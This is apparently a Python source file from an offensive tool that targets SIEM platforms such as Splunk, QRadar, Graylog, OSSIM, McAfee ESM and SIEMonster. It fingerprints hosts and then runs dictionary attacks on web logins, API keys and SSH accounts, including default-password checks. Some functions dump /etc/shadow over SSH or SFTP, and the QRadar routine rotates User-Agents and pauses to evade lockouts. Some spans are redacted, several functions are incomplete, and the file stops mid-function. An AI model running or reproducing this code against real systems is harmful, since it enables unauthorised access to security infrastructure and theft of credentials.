def qradar_apikeybrute(ip, port):
    """Try every entry of the API-key dictionary against a QRadar host.

    Args:
        ip: QRadar host address.
        port: HTTPS port of the QRadar console/API.

    The dictionary file name is `keys` (a module-level name, not visible here),
    located next to this module. If it is missing, the user is asked how many
    keys to generate and api_dict() (defined elsewhere) is expected to create
    the file. Each key is sent in the SEC header to /api/system/servers and an
    HTTP 200 is treated as a valid key. Results go through globals.messages /
    globals.qradar_messages; nothing is returned.
    """
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    if os.path.isfile(os.path.join(__location__, keys)):
        file = open(os.path.join(__location__, keys))
    else:
        cant = input(
            Fore.CYAN + Style.BRIGHT + "[!] Enter the number of apikeys you want in the dictionary: " + Style.RESET_ALL)
        try:
            api_dict(cant)
            file = open(os.path.join(__location__, keys))
        except:
            # NOTE(review): a bare except also catches KeyboardInterrupt/SystemExit,
            # and `file` is left unbound so the loop below then fails with
            # UnboundLocalError rather than a clear message.
            globals.qradar_messages(1)
    bfs = 0  # set to 1 once a key is accepted
    for line in file:
        api = line.strip('\n\r')
        url = globals.https + ip + ":" + str(port) + "/api/system/servers"
        headers = {'SEC': api}
        # verify=False: the TLS certificate is not validated, so the key in the
        # SEC header is exposed to anyone who can intercept the connection.
        # A request exception here propagates out of the function and leaves
        # the file handle open (no with/finally).
        if requests.get(url, headers=headers, verify=False).status_code == 200:
            globals.messages(7)
            globals.qradar_messages(2, api)
            bfs = 1
            file.close()
            break
    if bfs == 0:
        globals.messages(8)
        file.close()
def smonster_ssh_info(ip):
    """Collect host information from a SIEMonster box over SSH as the deploy user.

    Prompts for the password, runs a fixed list of read-only commands and prints
    each command's stdout under a labelled header. A failed login is reported
    via globals.messages(10); nothing is returned.
    """
    # NOTE(review): the span between the password prompt and the command table
    # is redacted in this copy of the source ("******"). The SSH client setup
    # and connect call that must sit there are not visible, so this block is
    # not syntactically complete as shown.
    password = input(Fore.CYAN + Style.NORMAL + "[!] Enter SIEMonster deploy's password: "******"hostname", "[!] Hostname"),
        ("docker ps --format \"table {{.Names}}\t{{.Ports}}\t" "{{.Status}}\"", "[!] Active Containers"),
        ("ls -1 /etc/rc5.d", "[!] List service active"),
        ("ifconfig", "[!] Network Configuration"),
        ("sudo iptables -nL", "[!] FW Configuration")]
        for command in commands:
            # command[0] is the shell command, command[1] the printed caption.
            stdin, stdout, stderr = ssh.exec_command(command[0])
            # NOTE(review): stdout is presumably a paramiko channel file, so the
            # comparison with "" never fails — confirm whether a check on the
            # read output was intended instead.
            if stdout != "":
                print('')
                print(Fore.GREEN + Style.NORMAL + command[1])
                print(Fore.GREEN + Style.NORMAL + SEPARATOR + Style.RESET_ALL)
                for i in stdout.readlines():
                    print('[!] ' + i.replace('\n', ''))
    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
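def menus(menu):
    """Print one of the numbered menus and return the user's raw selection.

    Args:
        menu: 1 for the main menu, 2 for the application menu, or a product
            name ("Splunk", "Graylog", "OSSIM", "QRadar", "McAfee",
            "SIEMonster", "ElasticSIEM") for that product's menu. The entry
            lists are read from the matching globals.*_menu attribute.

    Returns:
        The string typed at the selection prompt, unvalidated; callers
        interpret it (a number picks an entry, "x"/"X" leaves the menu).

    Raises:
        ValueError: if menu matches none of the known menus. (Previously
        `options` was left unbound in that case and the print loop failed
        with an UnboundLocalError.)
    """
    globals.messages(1, '')
    # Attribute names are looked up lazily so only the selected menu's list
    # has to exist on the globals module, as before.
    menu_attr = {
        1: 'main_menu',
        2: 'app_menu',
        "Splunk": 'splunk_menu',
        "Graylog": 'graylog_menu',
        "OSSIM": 'ossim_menu',
        "QRadar": 'qradar_menu',
        "McAfee": 'mcafee_menu',
        "SIEMonster": 'smonster_menu',
        "ElasticSIEM": 'elastic_menu',
    }
    try:
        entries = getattr(globals, menu_attr[menu])
    except KeyError:
        raise ValueError('unknown menu: ' + repr(menu)) from None
    for number, label in enumerate(entries, 1):
        print(Fore.GREEN + Style.BRIGHT + '\t[' + str(number) + '] ' + label)
    # The caption of the "X" entry depends on where "back" leads from here.
    if menu == 1:
        exit_label = '\t[X] Exit'
    elif menu == 2:
        exit_label = '\t[X] Return to Attack Menu'
    else:
        exit_label = '\t[X] Return to Main Menu'
    print(Fore.GREEN + Style.BRIGHT + exit_label)
    print(Fore.GREEN + Style.BRIGHT + SEPARATOR)
    choice = input(
        Fore.CYAN + Style.NORMAL + "[!] Enter your selection: " + Style.RESET_ALL)
    return choice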
def scan_detect():
    """Interactive single-host flow: ask for IP and port, fingerprint, offer the product menu.

    Relies on input_ip(), input_port(), scan_host(), attack_choice() and
    main_choice() defined elsewhere in this module. Returns nothing; control
    continues by calling the next menu function.
    """
    ip = input_ip()
    port = input_port()
    siemdetected = ''
    # `ip and port` evaluates to ip when ip is empty and to port otherwise, so
    # the comparison passes only when both are non-empty strings.
    if (ip and port) != '':
        siemdetected = scan_host(ip, port)
    else:
        globals.messages(3)
        sleep(1)
        # No return after main_choice(); should it ever return, the prompt
        # below still runs with siemdetected == ''.
        main_choice()
    choice2 = input(
        Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + siemdetected + " attack module (Y/N): " + Style.RESET_ALL)
    if choice2.lower() == "y":
        # A port of 0 ("not given") is mapped to a per-product default port.
        # NOTE(review): this compares with the int 0 while input_port()
        # presumably returns the typed string — confirm which type it yields.
        if port == 0 and siemdetected == "Splunk":
            attack_choice(siemdetected, ip, '8089')
        elif port == 0 and siemdetected == "Graylog":
            attack_choice(siemdetected, ip, '9000')
        elif port == 0 and (
                siemdetected == "OSSIM" or siemdetected == "QRadar" or siemdetected == "McAfee" or siemdetected == "SIEMonster"):
            attack_choice(siemdetected, ip, '443')
        else:
            attack_choice(siemdetected, ip, port)
    else:
        main_choice()
def find_siem():
    """Interactive network flow: sweep a range, fingerprint each host, offer the product menu.

    Uses input_net(), scan_network(), scan_host(), attack_choice() and
    main_choice() defined elsewhere in this module, and the globals.net_val
    regular expression to validate the typed range. Returns nothing.
    """
    siemsdetected = {}  # host address -> product name returned by scan_host()
    siemnet = input_net()
    if re.search(globals.net_val, siemnet):
        ips = scan_network(siemnet)
    else:
        globals.messages(4)
        sleep(1)
        # No return after main_choice(); should it ever return, `ips` is
        # unbound at the loop below.
        main_choice()
    globals.messages(6)
    for host in ips:
        # Port '0' presumably means "not specified" — confirm in scan_host().
        siemdetected = scan_host(host, '0')
        siemsdetected[host] = siemdetected
    siemchoice = input(
        Fore.CYAN + Style.BRIGHT + "[!] Enter the IP address of the SIEM to attack: " + Style.RESET_ALL)
    portchoice = input(
        Fore.CYAN + Style.BRIGHT + "[!] Enter the port of the SIEM to attack: " + Style.RESET_ALL)
    # NOTE(review): siemchoice is used as a dict key without validation; an
    # address that was not part of the sweep raises KeyError here.
    choice2 = input(
        Fore.CYAN + Style.BRIGHT + "[!] Do you want to launch the " + siemsdetected[siemchoice] + " attack module (Y/N): " + Style.RESET_ALL)
    if choice2.lower() == "y":
        attack_choice(siemsdetected[siemchoice], siemchoice, portchoice)
    else:
        main_choice()
def attack_choice(siemdetected, ip, port):
    """Show the product menu for siemdetected and dispatch to that product's handler.

    Args:
        siemdetected: product name as returned by the *_detect functions.
        ip: target address.
        port: target port, passed through unchanged.

    The per-product *_attack functions and main_choice() are defined elsewhere
    in this module. Returns nothing.
    """
    choiceerror = 0
    attackchoice = menus(siemdetected)
    if siemdetected == "Splunk":
        splunk_attack(attackchoice, ip, port)
    elif siemdetected == "Graylog":
        graylog_attack(attackchoice, ip, port)
    elif siemdetected == "OSSIM":
        ossim_attack(attackchoice, ip, port)
    elif siemdetected == "QRadar":
        qradar_attack(attackchoice, ip, port)
    elif siemdetected == "McAfee":
        mcafee_attack(attackchoice, ip, port)
    elif siemdetected == "SIEMonster":
        smonster_attack(attackchoice, ip, port)
    elif siemdetected == "ElasticSIEM":
        elastic_attack(attackchoice, ip, port)
    elif attackchoice.lower() == "x":
        # Only reached when siemdetected matched none of the products above;
        # for a known product the *_attack handler is expected to deal with "x".
        main_choice()
    else:
        globals.messages(2)
        sleep(1)
        # Re-enters this menu recursively; choiceerror is assigned only after
        # that call returns, so this frame skips the prompt below.
        attack_choice(siemdetected, ip, port)
        choiceerror = 1
    if attackchoice != "0" and choiceerror != 1:  # Not return and not error
        choice3 = input(
            Fore.CYAN + Style.BRIGHT + "[!] Do you want to return to the attack menu (Y/N): " + Style.RESET_ALL)
        if choice3.lower() == "y":
            attack_choice(siemdetected, ip, port)
        else:
            main_choice()
def smonster_ssh_bf(ip):
    """Dictionary attack against the SIEMonster "deploy" SSH account.

    Args:
        ip: target address.

    Confirms with nmap that TCP/22 is open, then tries each line of dict.txt
    (next to this module) through ssh_credentials(ip, password), defined
    elsewhere. Outcome is reported via globals.messages; nothing is returned.
    """
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # Opened without a context manager; every exit path below closes it by hand.
    file = open(os.path.join(__location__, 'dict.txt'))
    nm = nmap.PortScanner()
    bps = 0  # set to 1 once a password is accepted
    try:
        # Connect scan of port 22 only; timing template T4.
        nm.scan(hosts=ip, arguments='-sT -T4 -p 22')
        if nm[ip]['tcp'][22]['state'] == 'open':
            for line in file:
                password = line.strip('\n\r')
                if ssh_credentials(ip, password):
                    mess = ['deploy', password]
                    globals.messages(7)
                    globals.messages(9, mess)
                    file.close()
                    bps = 1
                    break
            if bps == 0:
                globals.messages(8)
                file.close()
        else:
            globals.messages(8)
            file.close()
    except Exception as e:
        # Scan errors, a host missing from the nmap result (KeyError) and
        # connection errors all end up here and are reported with the same
        # message (8) as an exhausted dictionary; the traceback goes to the log.
        globals.messages(8)
        file.close()
        logging.error(e, exc_info=True)
def smonster_users_server(ip):
    """Read /etc/shadow from a SIEMonster host over SSH (via sudo) and print each line.

    Prompts for the deploy user's password; a failed login is reported via
    globals.messages(10). Nothing is returned.
    """
    # NOTE(review): the span between the password prompt and the
    # `sudo cat /etc/shadow` command is redacted in this copy of the source
    # ("******"). The SSH client setup, the connect call and the exec_command
    # call are not visible, so this block is not syntactically complete as
    # shown; `std`/`stdout` below are presumably the channel files returned by
    # exec_command — confirm against the full source.
    password = input(Fore.CYAN + Style.NORMAL + "[!] Enter SIEMonster deploy's password: "******"sudo cat /etc/shadow")
        std.flush()
        shadow_file = stdout.readlines()
        globals.smonster_messages(2)
        for line in shadow_file:
            print('[!] ' + line.replace('\n', ''))
        ssh.close()
    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
def elastic_ssh_brute(ip):
    """Dictionary attack against an SSH account on an ElasticSIEM host.

    Args:
        ip: target address.

    Asks for the user name (the fallback used when the prompt is left empty is
    redacted in this copy of the source), confirms with nmap that TCP/22 is
    open, then tries each line of dict.txt (next to this module) through
    ssh_credentials(ip, password, username), defined elsewhere. Outcome is
    reported via globals.messages; nothing is returned.
    """
    username = input(Fore.CYAN + Style.NORMAL + "[!] Enter username of operations system: ")
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # Opened without a context manager; every exit path below closes it by hand.
    file = open(os.path.join(__location__, 'dict.txt'))
    nm = nmap.PortScanner()
    bps = 0  # set to 1 once a password is accepted
    if username == '':
        username = '******'
    try:
        # Connect scan of port 22 only; timing template T4.
        nm.scan(hosts=ip, arguments='-sT -T4 -p 22')
        if nm[ip]['tcp'][22]['state'] == 'open':
            for line in file:
                password = line.strip('\n\r')
                # Three-argument form; smonster_ssh_bf calls ssh_credentials
                # with two, so the user name presumably has a default there.
                if ssh_credentials(ip, password, username):
                    mess = [username, password]
                    globals.messages(7)
                    globals.messages(9, mess)
                    file.close()
                    bps = 1
                    break
            if bps == 0:
                globals.messages(8)
                file.close()
        else:
            globals.messages(8)
            file.close()
    except Exception as e:
        # Scan errors, a host missing from the nmap result (KeyError) and
        # connection errors are all reported with the same message (8) as an
        # exhausted dictionary; the traceback goes to the log.
        globals.messages(8)
        file.close()
        logging.error(e, exc_info=True)
def graylog_detect(siemip, siemport):
    """Fingerprint a Graylog web interface reachable at http://siemip:siemport.

    Args:
        siemip: host address (str).
        siemport: port (str; it is concatenated into the URL as-is).

    Returns:
        "Graylog" when the page body contains the Graylog title marker (after
        reporting it through globals.messages(5)), otherwise None. Any
        exception during the request is logged with logging.error and also
        yields None.
    """
    target = http + siemip + ":" + siemport
    product = None
    try:
        body = requests.get(target).text
        if "Graylog Web Interface" in body:
            globals.messages(5, ["Graylog", siemport])
            product = "Graylog"
    except Exception as err:
        logging.error(err, exc_info=True)
    return product
def splunk_detect(siemip, siemport):
    """Fingerprint a Splunk management endpoint at https://siemip:siemport.

    Args:
        siemip: host address (str).
        siemport: port (str; concatenated into the URL as-is).

    Returns:
        "Splunk" when the response body mentions "splunkd" (reported through
        globals.messages(5) first), otherwise None. Request errors are logged
        and yield None. TLS certificates are not validated (verify=False).
    """
    target = https + siemip + ":" + siemport
    product = None
    try:
        body = requests.get(target, verify=False).text
        if "splunkd" in body:
            globals.messages(5, ["Splunk", siemport])
            product = "Splunk"
    except Exception as err:
        logging.error(err, exc_info=True)
    return product
def ossim_detect(siemip, siemport):
    """Fingerprint an AlienVault OSSIM login page at https://siemip:siemport.

    Args:
        siemip: host address (str).
        siemport: port (str; concatenated into the URL as-is).

    Returns:
        "OSSIM" when /ossim/session/login.php contains "AlienVault OSSIM"
        (reported through globals.messages(5) first), otherwise None. Request
        errors are logged and yield None. TLS certificates are not validated.
    """
    login_page = https + siemip + ":" + siemport + "/ossim/session/login.php"
    product = None
    try:
        body = requests.get(login_page, verify=False).text
        if "AlienVault OSSIM" in body:
            globals.messages(5, ["OSSIM", siemport])
            product = "OSSIM"
    except Exception as err:
        logging.error(err, exc_info=True)
    return product
def qradar_detect(siemip, siemport):
    """Fingerprint a QRadar console at https://siemip:siemport/console/.

    Args:
        siemip: host address (str).
        siemport: port (str; concatenated into the URL as-is).

    Returns:
        "QRadar" when the Server response header contains "QRadar" (reported
        through globals.messages(5) first), otherwise None. A missing Server
        header (KeyError) and request errors are logged and yield None. TLS
        certificates are not validated.
    """
    console = https + siemip + ":" + siemport + "/console/"
    product = None
    try:
        server_header = requests.get(console, verify=False).headers['Server']
        if "QRadar" in server_header:
            globals.messages(5, ["QRadar", siemport])
            product = "QRadar"
    except Exception as err:
        logging.error(err, exc_info=True)
    return product
def smonster_detect(siemip, siemport):
    """Fingerprint a SIEMonster web front end at https://siemip:siemport.

    Args:
        siemip: host address (str).
        siemport: port (str; concatenated into the URL as-is).

    Returns:
        "SIEMonster" when the page title starts with "SIEMonster " (reported
        through globals.messages(5) first), otherwise None. Request errors are
        logged and yield None. TLS certificates are not validated.
    """
    target = https + siemip + ":" + siemport
    product = None
    try:
        body = requests.get(target, verify=False).text
        if 'title>SIEMonster ' in body:
            globals.messages(5, ["SIEMonster", siemport])
            product = "SIEMonster"
    except Exception as err:
        logging.error(err, exc_info=True)
    return product
def mcafee_detect(siemip, siemport):
    """Fingerprint a McAfee ESM web front end at https://siemip:siemport.

    Args:
        siemip: host address (str).
        siemport: port (str; concatenated into the URL as-is).

    Returns:
        "McAfee" when the body contains both "McAfee" and "SIEM" (reported
        through globals.messages(5) first), otherwise None. Request errors are
        logged and yield None. TLS certificates are not validated.
    """
    target = https + siemip + ":" + siemport
    product = None
    try:
        body = requests.get(target, verify=False).text
        matched = 'McAfee' in body
        if matched:
            matched = 'SIEM' in body
        if matched:
            globals.messages(5, ["McAfee", siemport])
            product = "McAfee"
    except Exception as err:
        logging.error(err, exc_info=True)
    return product
def bruteforce_splunk(ip, port):
    """Dictionary attack against a Splunk management login through `client.connect`.

    Args:
        ip: target address.
        port: management port.

    `client` is a module-level object (not visible here) whose connect() is
    expected to raise on a rejected login. An empty password (Splunk Free, no
    authentication) and the default password are tried first, then each line
    of dict.txt next to this module. The user-name and default-password
    literals are redacted in this copy of the source; the report messages
    name them as 'admin' and 'changeme'. Outcome is reported via
    globals.messages; nothing is returned.
    """
    username = "******"
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    # Opened without a context manager; closed by hand on every exit path.
    file = open(os.path.join(__location__, 'dict.txt'))
    bfs = 0  # dictionary password accepted
    free = 0  # empty password accepted
    defaultpass = 0  # default password accepted
    # First Try Default Password "changeme" and Splunk Free Version
    try:
        client.connect(host=ip, port=port, username=username, password="")
        free = 1
    except:
        # NOTE(review): a bare except treats network/TLS errors exactly like a
        # rejected password (and also swallows KeyboardInterrupt).
        pass
    try:
        client.connect(host=ip, port=port, username=username, password="******")
        defaultpass = 1
    except:
        pass
    # `free and defaultpass` is 0 when free is 0 and equals defaultpass
    # otherwise, so this branch runs unless both quick checks succeeded.
    if (free and defaultpass) == 0:
        for line in file:
            splunk_password = line.strip('\n\r')
            try:
                client.connect(host=ip, port=port, username=username, password=splunk_password)
                bfs = 1
                break
            except:
                pass
    # `bfs or free or defaultpass` is 1 if any of the three flags is set.
    if (bfs or free or defaultpass) == 1:
        globals.messages(7)
        if free == 1:
            globals.messages(9, ['admin', 'no password'])
            file.close()
        elif defaultpass == 1:
            globals.messages(9, ['admin', 'changeme'])
            file.close()
        else:
            # splunk_password is the dictionary line on which the loop broke.
            globals.messages(9, ['admin', splunk_password])
            file.close()
    else:
        globals.messages(8)
        file.close()
def mcafee_webinfo(ip, port):
    """Log in to the McAfee ESM REST API as the web user and print system information.

    Args:
        ip: target address.
        port: HTTPS port.

    Prompts for the password, sends the /ess login preamble, then a JSON login
    to /rs/esm/v2/login (password base64-encoded in the body), and on a 201
    reuses the returned cookie and XSRF token to read /rs/v1/systemInformation,
    printing the fields listed in data_show. The user-name literal is redacted
    in this copy of the source. Nothing is returned; errors are logged.
    """
    agents = 'Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/47.0'
    a = 0
    # Read with input(), so the password echoes to the terminal.
    password = input(
        Fore.CYAN + Style.NORMAL + "[!] Enter password of the user Web NGCP: " + Style.RESET_ALL)
    url1 = globals.https + ip + ":" + str(port) + "/ess"
    url2 = globals.https + ip + ":" + str(port) + "/rs/esm/v2/login"
    url3 = globals.https + ip + ":" + str(port) + "/rs/v1/systemInformation"
    headers = {
        'Accept': 'application/json,text/plain,*/*',
        'DNT': '1',
        'Host': ip,
        'Origin': globals.https + ip,
        'Referer': globals.https + ip,
        'User-Agent': agents[a],
        'Content-Type': 'application/json;charset=utf-8',
        'Connection': 'keep - alive',
        'X-Xsrf-Token': 'null'
    }
    # base64 is an encoding, not protection: the password travels in clear
    # inside the TLS session, and TLS itself is unverified (verify=False).
    params = {
        'username': '******',
        'password': str(base64.b64encode(password.encode('utf-8')), 'utf-8'),
        'locale': 'en_US',
        'os': "Linux x86_64"
    }
    json_params = json.dumps(params).encode('utf-8')
    # Keys of the systemInformation document that are printed.
    data_show = [
        'callHomeIp', 'releaseNumber', 'hdd', 'ram', 'processor', 'esssystemTime',
        'statusAndAlertNextCheckIn', 'rulesAndSoftNextCheck', 'backupNextTime'
    ]
    try:
        # Opaque login preamble expected by the /ess endpoint; its format is
        # not documented in this file.
        requests.post(
            url1, data='Request=API%13CAC%5FLOGIN%13%14', headers=headers, verify=False)
        headers['Accept'] = 'application/json'
        response = requests.post(
            url2, data=json_params, headers=headers, verify=False)
        if response.status_code == 201:
            # Session established: carry the cookie and XSRF token forward.
            headers['Cookie'] = response.headers['Set-Cookie']
            headers['X-Xsrf-Token'] = response.headers['xsrf-token']
            response2 = requests.get(url3, headers=headers, verify=False)
            globals.mcafee_messages(1)
            data = json.loads(response2.text)
            # A field missing from the document raises KeyError, caught below.
            for field in data_show:
                if data[field] != "":
                    print('[!] ' + field + ': ' + str(data[field]))
        else:
            globals.messages(10)
    except Exception as e:
        logging.error(e, exc_info=True)
def elasticsiem_detect(siemip, siemport):
    """Fingerprint a Kibana-hosted Elastic SIEM app at http://siemip:siemport/app/siem.

    Args:
        siemip: host address (str).
        siemport: port (str; concatenated into the URL as-is).

    Returns:
        "ElasticSIEM" when the body contains "Elastic" and the kbn-name header
        contains "elasticsiem" (reported through globals.messages(5) first),
        otherwise None. The header is only read when the body test passes; a
        missing header (KeyError) and request errors are logged and yield None.
    """
    app_url = http + siemip + ":" + siemport + '/app/siem'
    product = None
    try:
        page = requests.get(app_url)
        matched = "Elastic" in page.text
        if matched:
            matched = "elasticsiem" in page.headers['kbn-name']
        if matched:
            globals.messages(5, ["ElasticSIEM", siemport])
            product = "ElasticSIEM"
    except Exception as err:
        logging.error(err, exc_info=True)
    return product
def ova_credentials(ip, user, password):
    """Check whether (user, password) is accepted by the SSH service on ip.

    Args:
        ip: target address.
        user: user name to try.
        password: password to try.

    Reports an accepted login via globals.splunk_messages(10) and
    globals.messages(9), a rejected one via globals.splunk_messages(11).
    Exceptions other than AuthenticationException (socket errors, timeouts)
    propagate. Nothing is returned.
    """
    ssh = paramiko.SSHClient()
    # No known_hosts file is loaded and AutoAddPolicy accepts any host key
    # unseen, so a spoofed host at this address would receive the credentials.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    mess = [user, password]
    try:
        ssh.connect(ip, username=user, password=password)
        globals.splunk_messages(10)
        globals.messages(9, mess)
    except paramiko.AuthenticationException:
        globals.splunk_messages(11, mess)
    # NOTE(review): the session is never closed on the success path.
def main_choice():
    """Show the main menu and run the selected top-level action.

    "1" runs scan_detect(), "2" runs find_siem(), "x"/"X" exits the program;
    any other input prints globals.messages(2) and shows the menu again.
    Returns nothing.
    """
    actions = {"1": scan_detect, "2": find_siem}
    choice = menus(1)
    handler = actions.get(choice)
    if handler is not None:
        handler()
    elif choice.upper() == "X":
        quit()
    else:
        globals.messages(2)
        main_choice()
def graylog_brute(ip, port):
    """Dictionary attack against the Graylog REST session login (/api/system/sessions).

    Args:
        ip: target address.
        port: REST API port.

    Posts {username, password, host} as JSON for each line of dict.txt next to
    this module; an HTTP 200 is taken as a created session. The user-name
    literal is redacted in this copy of the source; the report message names
    it as 'admin'. Outcome is reported via globals.messages; nothing is
    returned.
    """
    url = \
        globals.http + ip + ":" + str(port) + "/api/system/sessions"
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    files = open(os.path.join(__location__, 'dict.txt'))
    bruteforcesuccesfull = 0  # set to 1 once a password is accepted
    for line in files:
        password = line.strip('\n\r')
        params = {'username': '******', 'password': password, 'host': ip}
        # Presumably required by the API's request-origin check — confirm.
        headers = {'X-Requested-By': 'XMLHttpRequest'}
        try:
            # The URL is built from globals.http, so credentials travel in clear
            # text; verify=False has no effect on a plain-HTTP request.
            response = requests.post(url, json=params, headers=headers, verify=False)
            if response.status_code == 200:
                globals.messages(7)
                mess = ['admin', password]
                globals.messages(9, mess)
                bruteforcesuccesfull = 1
                files.close()
                break
        except Exception as e:
            logging.error(e, exc_info=True)
    # Runs on every path; a second close() after the success path is a no-op.
    files.close()
    if not bruteforcesuccesfull:
        globals.messages(8)
def mcafee_users_server(ip):
    """Read /etc/shadow from a McAfee ESM appliance over SFTP and print each line.

    Args:
        ip: target address.

    Prompts for the root password (the user-name literal is redacted in this
    copy of the source; the prompt text says root). A failed login is reported
    via globals.messages(10). On the target this appears as an SSH login
    followed by an SFTP subsystem request for /etc/shadow. Nothing is returned.
    """
    # Read with input(), so the password echoes to the terminal.
    password = input(
        Fore.CYAN + Style.NORMAL + "[!] Enter McAfee root's password: " + Style.RESET_ALL)
    ssh = paramiko.SSHClient()
    ssh.load_system_host_keys()
    # AutoAddPolicy accepts any host key not already in the system known_hosts,
    # so the loaded keys only protect connections to hosts seen before.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # banner_timeout=200: wait up to 200 s for the server's SSH banner.
        ssh.connect(ip, username='******', password=password, banner_timeout=200)
        sftp = ssh.open_sftp()
        shadow_file = sftp.open('/etc/shadow')
        globals.mcafee_messages(2)
        for line in shadow_file:
            print('[!] ' + line.replace('\n', ''))
        shadow_file.close()
        ssh.close()
    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
    # NOTE(review): errors other than a rejected login (e.g. the SFTP open
    # failing, socket errors) propagate and leave the SSH session open.
def elastic_ssh_info(ip):
    """Collect host information from an ElasticSIEM box over SSH.

    Prompts for a user name and password, runs a fixed list of read-only
    commands and prints each command's stdout under a labelled header. A
    failed login is reported via globals.messages(10); nothing is returned.
    """
    # NOTE(review): two spans of this function are redacted in this copy of the
    # source ("******"): the tail of the user-name prompt through the start of
    # the password prompt, and the tail of the password prompt through the SSH
    # client setup/connect and the opening of the command table. The block is
    # therefore not syntactically complete as shown.
    username = input(Fore.CYAN + Style.NORMAL + "[!] Enter ElasticSIEM's username: "******"[!] Enter ElasticSIEM's password: "******"hostname", "[!] Hostname"),
        ("ls -1 /etc/rc5.d", "[!] List service active"),
        ("ifconfig", "[!] Network Configuration"),
        ('netstat -putan | grep LISTEN', "[!] Ports active")]
        for command in commands:
            # command[0] is the shell command, command[1] the printed caption.
            std, stdout, stderr = ssh.exec_command(command[0])
            # NOTE(review): stdout is presumably a paramiko channel file, so the
            # comparison with "" never fails — confirm whether a check on the
            # read output was intended instead.
            if stdout != "":
                print('')
                print(Fore.GREEN + Style.NORMAL + command[1])
                print(Fore.GREEN + Style.NORMAL + globals.SEPARATOR + Style.RESET_ALL)
                for i in stdout.readlines():
                    print('[!] ' + i.replace('\n', ''))
        ssh.close()
    except paramiko.AuthenticationException:
        globals.messages(10)
        ssh.close()
def ossim_brute(ip, port):
    """Dictionary attack against the OSSIM web login (/ossim/session/login.php).

    Args:
        ip: target address.
        port: HTTPS port.

    For each line of dict.txt next to this module, posts the login form fields
    (the password both in clear as 'passu' and base64-encoded as 'pass'). A
    302 status or landing on successurl is taken as success. The user-name
    literal is redacted in this copy of the source; the report message names
    it as 'admin'. Outcome is reported via globals.messages; nothing is
    returned.
    """
    url = globals.https + ip + ":" + str(port) + "/ossim/session/login.php"
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    file = open(os.path.join(__location__, 'dict.txt'))
    # Landing page expected after a successful login (built without the port).
    successurl = globals.https + ip + "/ossim/"
    bruteforceresult = 0  # set to 1 once a password is accepted
    for line in file:
        ossimpassword = line.strip('\n\r')
        ossimpasswordb64 = base64.b64encode(ossimpassword.encode("utf-8"))
        base64string = str(ossimpasswordb64, "utf-8")
        params = {
            'embed': '',
            'bookmark_string': '',
            'user': '******',
            'passu': ossimpassword,
            'pass': base64string
        }
        try:
            # params= places the fields in the query string rather than the POST
            # body, so user/passu/pass end up in the web-server and proxy access
            # logs of the target. TLS is not verified (verify=False).
            response = requests.post(url, params=params, verify=False)
            if response.status_code == 302 or response.url == successurl:
                globals.messages(7)
                mess = ['admin', ossimpassword]
                globals.messages(9, mess)
                bruteforceresult = 1
                file.close()
                break
        except Exception as e:
            logging.error(e, exc_info=True)
    if not bruteforceresult:
        globals.messages(8)
        file.close()
def qradar_brute(ip, port):
    """Dictionary attack against the QRadar console login (j_security_check).

    Args:
        ip: target address.
        port: HTTPS port.

    For each line of dict.txt next to this module: open a fresh session, GET
    /console/ to obtain the CSRF cookie, then POST j_username/j_password/
    LoginCSRF. Landing on /console/core/jsp/Main.jsp is taken as success.
    The user-name literal is redacted in this copy of the source; the report
    message names it as 'admin'. Outcome is reported via globals.messages;
    nothing is returned.
    """
    __location__ = os.path.realpath(
        os.path.join(os.getcwd(), os.path.dirname(__file__)))
    file = open(os.path.join(__location__, 'dict.txt'))
    bfs = 0  # set to 1 once a password is accepted
    url_base = globals.https + ip + ":" + str(port)
    # User-Agent strings selected by index `a`, advanced in the loop below.
    agents = [
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, '
        'like Gecko) Chrome/79.0.3945.88 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) '
        'Gecko/20100101 Firefox/47.0',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) '
        'Gecko/20100101 Firefox/42.0',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, '
        'like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) '
        'AppleWebKit/603.1.30 (KHTML, like Gecko)'
        ' Version/10.0 Mobile/14E304 Safari/602.1'
    ]
    a = 0
    for line in file:
        password = line.strip('\n\r')
        url = url_base + "/console/"
        session = requests.Session()  # fresh cookie jar for every attempt
        headers = {'user-agent': agents[a]}
        # TLS is never verified (verify=False) on any request in this function.
        # This GET and the header slicing below sit outside the try, so a
        # request error or a missing Set-Cookie header (KeyError) propagates
        # out of the function with the file left open.
        response = session.get(url, headers=headers, verify=False)
        headers = {'user-agent': agents[a], 'QRadarCSRF': 'null'}
        # CSRF token cut out of the raw Set-Cookie header by string slicing,
        # between 'CSRF=' and '; Max'.
        qradarcsrf = response.headers[
            'Set-Cookie'][response.headers['Set-Cookie'].find('CSRF=') + 5:response.headers['Set-Cookie'].find('; Max')]
        params = {
            'j_username': '******',
            'j_password': password,
            'LoginCSRF': qradarcsrf
        }
        auth = url_base + "/console/j_security_check"
        try:
            response2 = session.post(auth, data=params, headers=headers, verify=False)
            # NOTE(review): 322 is not a registered HTTP status code — confirm intent.
            if response2.url == url_base + "/console/core/jsp/Main.jsp" or response2.status_code == 322:
                globals.messages(7)
                globals.messages(9, ['admin', password])
                bfs = 1
                file.close()
                break
            else:
                # After each rejected attempt move to the next User-Agent; after
                # the fifth one pause for 1800 s and start again from the first.
                if a <= 3:
                    a += 1
                else:
                    time.sleep(1800)
                    a = 0
        except Exception as e:
            logging.error(e, exc_info=True)
    if bfs == 0:
